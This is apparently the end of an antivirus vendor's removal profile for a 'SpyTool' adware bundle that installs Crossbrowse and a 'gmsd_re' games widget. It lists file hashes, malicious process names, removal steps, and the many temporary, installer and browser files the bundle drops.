d081a7e3dd9a488c32621440efefd8a2 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libglesv2.dll |
015b0ed92a5cc7ef3f727eafa50f34c3 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\metro_driver.dll |
c466ce7d02c7b0ee5160c1d40e10fdbf | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\nacl64.exe |
e5aed26e81a2567fe8f71e51feed2ed7 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\pdf.dll |
14b1d2a3a4b5f74541292de251244f66 | c:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe |
d2a7b8934eb6ff84efc6479c91c8081b | c:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe |
7f6a928f07d1035cfe07401521d81925 | c:\Program Files\gmsd_re_005010077\gamesdesktop_widget.exe |
d39359e174af9b54277e4f7b89956a0f | c:\Program Files\gmsd_re_005010077\gmsd_re_005010077.exe |
304073b3e9037d4c26b1509a80eb21ee | c:\Program Files\gmsd_re_005010077\predm.exe |
0ff72e16329a69960686a61ea9943c1d | c:\Program Files\gmsd_re_005010077\unins000.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsg13.tmp:912
%original file name%.exe:1504
nsa19.tmp:648
nsa19.tmp:364
gmsd_re_005010077.exe:1880
fsd34.exe:1368
nsm32.tmp:444
setup.exe:564
taskkill.exe:640
taskkill.exe:584
taskkill.exe:952
upgmsd_re_005010077.exe:1364
amisid.exe:1512
amisid.exe:1556
tasklist.exe:164
tasklist.exe:1540
nst16.tmp:1340
nsh2B.tmp:344
nsh2B.tmp:1860
encrypt.exe:560
encrypt.exe:1400
encrypt.exe:424
encrypt.exe:460
3075.exe:976
nsiB.tmp:644
nsw7.tmp:1688
nst36.tmp:2008
nsw22.tmp:272 - Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Local Settings\Temp\3075.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2B.tmp (366298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm32.tmp (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\policyname[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse37.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe (366298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw22.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_362[1].exe (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lHFcE[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (20572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VuuPC_VO2_8907[1].exe (15336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vos[1].htm (853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3D.tmp (15336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst36.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\df4a6a3ed77e60d6758afca091ca0c1f[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg13.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1C.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\gmsd_re_005010077\1.20\cnf.cyl (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\SecondResult.txt (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd40.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\FinalInstaller_dotnet4[1].exe (1479345 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libegl.dll (204 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\he.pak (254 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\et.pak (202 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl64.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\en-GB.pak (190 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libexif.dll (303 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\smalllogo.png (9 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Crossbrowse\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\bn.pak (1732 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sl.pak (212 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\tr.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pl.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\zh-TW.pak (191 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\nb.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\lv.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\zh-CN.pak (188 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sv.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\am.pak (302 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\de.pak (225 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\secondarytile.png (3 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Extensions\external_extensions.json (99 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_100_percent.pak (7386 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ro.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\resources.pak (117997 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fr.pak (240 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (5873 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pt-BR.pak (218 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sk.pak (230 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hi.pak (1713 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\kn.pak (1769 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\sr.pak (1611 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome.dll (237340 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\mr.pak (1709 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\icudtl.dat (76792 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\hu.pak (236 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\es.pak (231 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\bg.pak (1641 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\te.pak (1762 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\vi.pak (248 bytes)
%Documents and Settings%\All Users\Desktop\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\39.6.2171.95.manifest (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\chrome.7z (1150215 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ml.pak (1827 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\it.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ru.pak (1613 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ar.pak (294 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\lt.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\crossbrowse.exe (3869 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\el.pak (1668 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\PepperFlash\pepflashplayer.dll (110258 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\id.pak (203 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ko.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\VisualElementsManifest.xml (394 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\master_preferences (814 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\ms.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\nl.pak (217 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\pdf.dll (67091 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\da.pak (206 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\uk.pak (1622 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fa.pak (308 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw29.tmp (6012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\checks.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa19.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-A2FKP.tmp (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010077\is-9C6SV.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-IFSM2.tmp (2105 bytes)
%Program Files%\gmsd_re_005010077\gamesdesktop_widget.exe (77294 bytes)
%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe (29430 bytes)
%Program Files%\gmsd_re_005010077\unins000.dat (29081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\ex.bat (1564 bytes)
%Program Files%\gmsd_re_005010077\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\CheckProc.cmd (288 bytes)
%Program Files%\gmsd_re_005010077\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-VS088.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-V8RVC.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-2EA6S.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-Q2DVB.tmp\nsh2B.tmp (3779 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.exe (31997 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.exe (24223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.exe (1911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.exe (92831 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\prefs (823 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\skype.ico (44 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\expedia.ico (1921 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\youtube.ico (3913 bytes)
